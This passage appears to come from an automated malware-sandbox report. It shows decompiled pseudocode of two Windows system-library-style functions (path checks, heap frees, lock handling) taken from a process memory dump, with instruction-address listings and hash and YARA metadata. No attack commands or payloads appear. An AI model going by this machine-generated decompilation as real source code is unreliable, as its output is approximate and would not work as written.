																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E053895D0();
																			L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0538B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E05383D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0538B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                      0x05364128
                                      0x05364135
                                      0x0536413c
                                      0x05364141
                                      0x05364145
                                      0x05364147
                                      0x0536414e
                                      0x05364151
                                      0x05364159
                                      0x0536415c
                                      0x05364160
                                      0x05364164
                                      0x05364168
                                      0x0536416c
                                      0x0536417f
                                      0x05364181
                                      0x0536446a
                                      0x0536446a
                                      0x0536418c
                                      0x05364195
                                      0x05364199
                                      0x05364432
                                      0x05364439
                                      0x0536443d
                                      0x05364442
                                      0x05364447
                                      0x00000000
                                      0x0536419f
                                      0x053641a3
                                      0x053641b1
                                      0x053641b9
                                      0x053641bd
                                      0x053645db
                                      0x053645db
                                      0x00000000
                                      0x053641c3
                                      0x053641c3
                                      0x053641ce
                                      0x053641d4
                                      0x053ae138
                                      0x053ae13e
                                      0x053ae169
                                      0x053ae16d
                                      0x053ae19e
                                      0x053ae16f
                                      0x053ae16f
                                      0x053ae175
                                      0x053ae179
                                      0x053ae18f
                                      0x053ae193
                                      0x00000000
                                      0x053ae199
                                      0x00000000
                                      0x053ae199
                                      0x053ae193
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053641da
                                      0x053641da
                                      0x053641df
                                      0x053641e4
                                      0x053641ec
                                      0x05364203
                                      0x05364207
                                      0x053ae1fd
                                      0x05364222
                                      0x05364226
                                      0x053ae1f3
                                      0x053ae1f3
                                      0x0536422c
                                      0x0536422c
                                      0x05364233
                                      0x053ae1ed
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x05364239
                                      0x05364239
                                      0x05364239
                                      0x05364239
                                      0x05364233
                                      0x05364226
                                      0x053641ee
                                      0x053641ee
                                      0x053641f4
                                      0x05364575
                                      0x053ae1b1
                                      0x053ae1b1
                                      0x00000000
                                      0x0536457b
                                      0x0536457b
                                      0x05364582
                                      0x053ae1ab
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x05364588
                                      0x05364588
                                      0x0536458c
                                      0x053ae1c4
                                      0x053ae1c4
                                      0x00000000
                                      0x05364592
                                      0x05364592
                                      0x05364599
                                      0x053ae1be
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0536459f
                                      0x0536459f
                                      0x053645a3
                                      0x053ae1d7
                                      0x053ae1e4
                                      0x00000000
                                      0x053645a9
                                      0x053645a9
                                      0x053645b0
                                      0x053ae1d1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053645b6
                                      0x053645b6
                                      0x053645b6
                                      0x00000000
                                      0x053645b6
                                      0x053645b0
                                      0x053645a3
                                      0x05364599
                                      0x0536458c
                                      0x05364582
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053641f4
                                      0x0536423e
                                      0x05364241
                                      0x053645c0
                                      0x053645c4
                                      0x00000000
                                      0x053645ca
                                      0x053645ca
                                      0x00000000
                                      0x053ae207
                                      0x053ae20f
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053645d1
                                      0x00000000
                                      0x00000000
                                      0x053645ca
                                      0x00000000
                                      0x05364247
                                      0x05364247
                                      0x05364247
                                      0x05364249
                                      0x05364249
                                      0x05364249
                                      0x05364251
                                      0x05364251
                                      0x05364257
                                      0x0536425f
                                      0x0536426e
                                      0x05364270
                                      0x0536427a
                                      0x053ae219
                                      0x053ae219
                                      0x05364280
                                      0x05364282
                                      0x05364456
                                      0x053645ea
                                      0x00000000
                                      0x053645f0
                                      0x053ae223
                                      0x00000000
                                      0x053ae223
                                      0x0536445c
                                      0x0536445c
                                      0x00000000
                                      0x0536445c
                                      0x00000000
                                      0x05364288
                                      0x0536428c
                                      0x053ae298
                                      0x05364292
                                      0x05364292
                                      0x0536429e
                                      0x053642a3
                                      0x053642a7
                                      0x053642ac
                                      0x053ae22d
                                      0x053642b2
                                      0x053642b2
                                      0x053642b9
                                      0x053642bc
                                      0x053642c2
                                      0x053642ca
                                      0x053642cd
                                      0x053642cd
                                      0x053642d4
                                      0x0536433f
                                      0x0536433f
                                      0x053642d6
                                      0x053642d6
                                      0x053642d9
                                      0x053642dd
                                      0x053642eb
                                      0x053ae23a
                                      0x053642f1
                                      0x05364305
                                      0x0536430d
                                      0x05364315
                                      0x05364318
                                      0x0536431f
                                      0x05364322
                                      0x0536432e
                                      0x0536433b
                                      0x0536433b
                                      0x00000000
                                      0x0536432e
                                      0x053642eb
                                      0x0536434c
                                      0x0536434e
                                      0x05364352
                                      0x05364359
                                      0x0536435e
                                      0x05364361
                                      0x0536436e
                                      0x0536438a
                                      0x0536438e
                                      0x05364396
                                      0x0536439e
                                      0x053643a1
                                      0x053643ad
                                      0x053643bb
                                      0x053643bb
                                      0x053643ad
                                      0x0536436e
                                      0x053643bf
                                      0x053643c5
                                      0x05364463
                                      0x05364463
                                      0x053643ce
                                      0x053643d5
                                      0x053643d9
                                      0x053643df
                                      0x05364475
                                      0x05364479
                                      0x05364491
                                      0x05364491
                                      0x05364479
                                      0x053643e5
                                      0x053643eb
                                      0x053643f4
                                      0x053643f6
                                      0x053643f9
                                      0x053643fc
                                      0x053643ff
                                      0x053644e8
                                      0x053644ed
                                      0x053644f3
                                      0x053ae247
                                      0x00000000
                                      0x053644f9
                                      0x05364504
                                      0x05364508
                                      0x0536450f
                                      0x053ae269
                                      0x00000000
                                      0x05364515
                                      0x05364519
                                      0x05364531
                                      0x05364534
                                      0x05364537
                                      0x0536453e
                                      0x05364541
                                      0x0536454a
                                      0x053ae255
                                      0x053ae255
                                      0x053ae25b
                                      0x053ae25e
                                      0x053ae261
                                      0x053ae261
                                      0x05364555
                                      0x05364559
                                      0x0536455d
                                      0x053ae26d
                                      0x053ae270
                                      0x053ae274
                                      0x053ae27a
                                      0x053ae27d
                                      0x053ae28e
                                      0x053ae28e
                                      0x05364563
                                      0x05364563
                                      0x05364569
                                      0x05364569
                                      0x00000000
                                      0x0536455d
                                      0x0536450f
                                      0x00000000
                                      0x053644f3
                                      0x053643ff
                                      0x05364405
                                      0x05364405
                                      0x05364405
                                      0x053642ac
                                      0x0536428c
                                      0x05364282
                                      0x05364407
                                      0x0536440d
                                      0x053ae2af
                                      0x053ae2af
                                      0x05364413
                                      0x05364413
                                      0x00000000
                                      0x053641d4
                                      0x00000000
                                      0x053641c3
                                      0x053641bd
                                      0x05364415
                                      0x05364415
                                      0x05364416
                                      0x05364417
                                      0x05364429
                                      0x0536416e
                                      0x0536416e
                                      0x05364175
                                      0x05364498
                                      0x0536449f
                                      0x053ae12d
                                      0x00000000
                                      0x053ae133
                                      0x00000000
                                      0x053ae133
                                      0x053644a5
                                      0x053644a5
                                      0x053644aa
                                      0x00000000
                                      0x053644bb
                                      0x053644ca
                                      0x053644d6
                                      0x053644d7
                                      0x053644d8
                                      0x053644e3
                                      0x053644e3
                                      0x053644aa
                                      0x0536417b
                                      0x0536417b
                                      0x0536417b
                                      0x00000000
                                      0x0536417b
                                      0x05364175
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 972414edfce539e88f0edf3154b6cb318b646b68fb549aa6c83fbeb7c6d88def
                                      • Instruction ID: 9293c4733a547fccdce7859e50a59a9bd6812e5dc32b5ab17c3cf31788a630f5
                                      • Opcode Fuzzy Hash: 972414edfce539e88f0edf3154b6cb318b646b68fb549aa6c83fbeb7c6d88def
                                      • Instruction Fuzzy Hash: 41F19C71A083118FCB24DF59C484A3AB7E6FF88704F14892EF886CB694E774D891DB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053720A0, Relevance: .4, Instructions: 420COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E053720A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x5438714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E05372EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E05372EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E053458EC(_t240);
									_t221 =  *0x5435cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x5435cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E05384A2C(0x5436e40, 0x5384b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E05367D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x5325c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0537F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0537F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E053C7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L05362400(_t267 + 0x20);
															}
															L05362400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E05372397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E05362280(_t134, 0x5438608);
									__eflags =  *0x5436e48 - _t253; // 0x359cb18
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0535FFB0(_t198, _t241, 0x5438608);
										__eflags = _t253;
										if(_t253 != 0) {
											L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x5436e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x5438608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E05376B90(_t210,  &_v64);
										_t262 =  *0x5438608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0537E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E053897C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0538006A(0x5438608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x5438608);
												E0538B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x5436904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x5436e48; // 0x359cb18
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0535FFB0(_t198, _t240, 0x5438608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E053800C2(0x5438608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                      0x053720a0
                                      0x053720a8
                                      0x053720ad
                                      0x053720b3
                                      0x053720b8
                                      0x053720c2
                                      0x053720c7
                                      0x053720cb
                                      0x053720d2
                                      0x05372263
                                      0x05372266
                                      0x053b5836
                                      0x053b5836
                                      0x00000000
                                      0x0537226c
                                      0x0537226c
                                      0x05372270
                                      0x05372274
                                      0x053720e2
                                      0x053720e2
                                      0x053720e6
                                      0x053720ee
                                      0x053b57dc
                                      0x053b57de
                                      0x053b57ec
                                      0x053b57ec
                                      0x053b57f1
                                      0x053b57f3
                                      0x053b57f8
                                      0x00000000
                                      0x053b57f8
                                      0x053b57e0
                                      0x053b57e4
                                      0x053b57ea
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053b57ea
                                      0x053720f4
                                      0x053720f4
                                      0x053720f8
                                      0x053720f8
                                      0x053720fc
                                      0x05372100
                                      0x05372106
                                      0x05372201
                                      0x05372206
                                      0x0537220b
                                      0x0537220e
                                      0x053722a9
                                      0x053722ac
                                      0x00000000
                                      0x00000000
                                      0x053722b2
                                      0x053722b5
                                      0x053b5801
                                      0x053b5806
                                      0x00000000
                                      0x00000000
                                      0x053b5810
                                      0x053b5815
                                      0x053b5818
                                      0x00000000
                                      0x00000000
                                      0x053b581e
                                      0x053722bb
                                      0x053722bb
                                      0x05372218
                                      0x05372218
                                      0x0537221c
                                      0x05372220
                                      0x05372222
                                      0x053722c2
                                      0x053722c4
                                      0x053722dc
                                      0x053722dc
                                      0x053722e1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053722e7
                                      0x053722c8
                                      0x053722cd
                                      0x053722d3
                                      0x053722d6
                                      0x053b5823
                                      0x053b5825
                                      0x053b5827
                                      0x00000000
                                      0x00000000
                                      0x053b582d
                                      0x00000000
                                      0x053b582d
                                      0x00000000
                                      0x05372228
                                      0x05372228
                                      0x00000000
                                      0x05372228
                                      0x05372222
                                      0x05372214
                                      0x05372214
                                      0x00000000
                                      0x05372114
                                      0x05372114
                                      0x05372114
                                      0x0537211a
                                      0x0537211c
                                      0x05372348
                                      0x0537234d
                                      0x053b5840
                                      0x053b5845
                                      0x053b5848
                                      0x053b584e
                                      0x053b584e
                                      0x053b5848
                                      0x05372353
                                      0x05372355
                                      0x05372388
                                      0x05372388
                                      0x05372368
                                      0x0537236a
                                      0x0537236c
                                      0x0537238f
                                      0x00000000
                                      0x0537236e
                                      0x0537236e
                                      0x0537218e
                                      0x0537218e
                                      0x05372191
                                      0x05372195
                                      0x053b5a03
                                      0x053b5a06
                                      0x053b5a0c
                                      0x053b5a0f
                                      0x053b5a11
                                      0x053b5a13
                                      0x053b5a13
                                      0x053b5a19
                                      0x053b5a1f
                                      0x00000000
                                      0x0537219b
                                      0x0537219b
                                      0x053721a0
                                      0x05372282
                                      0x05372284
                                      0x05372284
                                      0x05372284
                                      0x05372284
                                      0x053721a6
                                      0x053721a9
                                      0x053721ac
                                      0x053721ae
                                      0x053721b3
                                      0x0537228b
                                      0x05372290
                                      0x05372379
                                      0x05372296
                                      0x05372298
                                      0x05372298
                                      0x05372290
                                      0x053721b9
                                      0x053721be
                                      0x053722a2
                                      0x053722a2
                                      0x053721c4
                                      0x053721c8
                                      0x053721cc
                                      0x053721d0
                                      0x053721d4
                                      0x053721de
                                      0x053721e3
                                      0x053b5a29
                                      0x053b5a2c
                                      0x00000000
                                      0x00000000
                                      0x053b5a3b
                                      0x00000000
                                      0x053721e9
                                      0x053721e9
                                      0x053721e9
                                      0x053721ee
                                      0x053721f1
                                      0x053b5a45
                                      0x053b5a4b
                                      0x053b5a52
                                      0x053b5a58
                                      0x053b5a5d
                                      0x053b5a5f
                                      0x053b5a71
                                      0x053b5a61
                                      0x053b5a6a
                                      0x053b5a6a
                                      0x053b5a76
                                      0x053b5a79
                                      0x053b5a7f
                                      0x053b5a83
                                      0x053b5a85
                                      0x053b5a87
                                      0x053b5a87
                                      0x053b5a8c
                                      0x053b5a91
                                      0x053b5a97
                                      0x053b5a9f
                                      0x053b5aa0
                                      0x053b5aa1
                                      0x053b5aa6
                                      0x053b5aab
                                      0x053b5ab1
                                      0x053b5ab3
                                      0x053b5ab9
                                      0x053b5aca
                                      0x053b5ad4
                                      0x053b5ad4
                                      0x053b5ade
                                      0x053b5ade
                                      0x053b5aab
                                      0x053b5a79
                                      0x053b5a52
                                      0x053721f7
                                      0x053721f9
                                      0x053721fe
                                      0x053721fe
                                      0x053721e3
                                      0x05372195
                                      0x0537236c
                                      0x05372122
                                      0x05372122
                                      0x05372124
                                      0x05372231
                                      0x05372236
                                      0x05372236
                                      0x05372238
                                      0x05372238
                                      0x05372240
                                      0x05372242
                                      0x05372244
                                      0x053b59fc
                                      0x0537218c
                                      0x0537218c
                                      0x00000000
                                      0x0537218c
                                      0x0537224a
                                      0x0537224f
                                      0x05372256
                                      0x05372304
                                      0x05372309
                                      0x0537230f
                                      0x0537231e
                                      0x0537231e
                                      0x0537231e
                                      0x05372320
                                      0x05372325
                                      0x0537232a
                                      0x0537232c
                                      0x0537233e
                                      0x0537233e
                                      0x00000000
                                      0x0537232c
                                      0x05372311
                                      0x05372317
                                      0x0537231a
                                      0x0537231c
                                      0x05372380
                                      0x05372380
                                      0x05372380
                                      0x05372384
                                      0x00000000
                                      0x00000000
                                      0x05372386
                                      0x00000000
                                      0x0537231c
                                      0x0537225c
                                      0x0537225c
                                      0x00000000
                                      0x0537225c
                                      0x0537212a
                                      0x05372134
                                      0x05372138
                                      0x0537213d
                                      0x053b5858
                                      0x053b5863
                                      0x053b5863
                                      0x053b5867
                                      0x053b586a
                                      0x00000000
                                      0x00000000
                                      0x053b586c
                                      0x053b586c
                                      0x053b5871
                                      0x053b5875
                                      0x053b5877
                                      0x053b5997
                                      0x053b599c
                                      0x053b59a1
                                      0x053b59a7
                                      0x053b59a7
                                      0x00000000
                                      0x053b59a7
                                      0x053b587d
                                      0x00000000
                                      0x053b588b
                                      0x053b588b
                                      0x053b5890
                                      0x053b5892
                                      0x053b5894
                                      0x053b5899
                                      0x053b589b
                                      0x053b58a0
                                      0x053b58a0
                                      0x053b58aa
                                      0x053b58b2
                                      0x053b58b6
                                      0x053b58be
                                      0x053b58c6
                                      0x053b58c9
                                      0x053b590d
                                      0x053b5917
                                      0x053b591a
                                      0x053b591c
                                      0x053b5920
                                      0x053b5928
                                      0x053b592a
                                      0x053b592c
                                      0x053b592e
                                      0x053b592e
                                      0x053b58cb
                                      0x053b58cd
                                      0x053b58d8
                                      0x053b58e0
                                      0x053b58f4
                                      0x053b58fe
                                      0x053b58fe
                                      0x053b593a
                                      0x053b593e
                                      0x053b5940
                                      0x053b5942
                                      0x00000000
                                      0x053b5944
                                      0x053b5944
                                      0x053b5949
                                      0x053b594e
                                      0x053b594e
                                      0x053b5953
                                      0x053b595b
                                      0x053b5976
                                      0x053b5976
                                      0x053b597a
                                      0x053b597f
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053b5981
                                      0x053b5981
                                      0x053b5981
                                      0x053b5983
                                      0x053b5988
                                      0x053b598d
                                      0x053b5991
                                      0x053b5991
                                      0x00000000
                                      0x053b595d
                                      0x053b595d
                                      0x053b5963
                                      0x053b5965
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053b5967
                                      0x053b5967
                                      0x053b596b
                                      0x053b596d
                                      0x00000000
                                      0x00000000
                                      0x053b596f
                                      0x053b5971
                                      0x053b5971
                                      0x053b5974
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053b5974
                                      0x00000000
                                      0x053b5967
                                      0x053b595b
                                      0x053b5942
                                      0x053b5863
                                      0x05372143
                                      0x05372143
                                      0x05372149
                                      0x0537214f
                                      0x053722f1
                                      0x053722f6
                                      0x00000000
                                      0x05372173
                                      0x05372173
                                      0x0537217d
                                      0x05372181
                                      0x05372186
                                      0x053b59ae
                                      0x053b59b2
                                      0x053b59b5
                                      0x053b59b7
                                      0x053b59ba
                                      0x053b59cd
                                      0x053b59d1
                                      0x053b59d5
                                      0x053b59d9
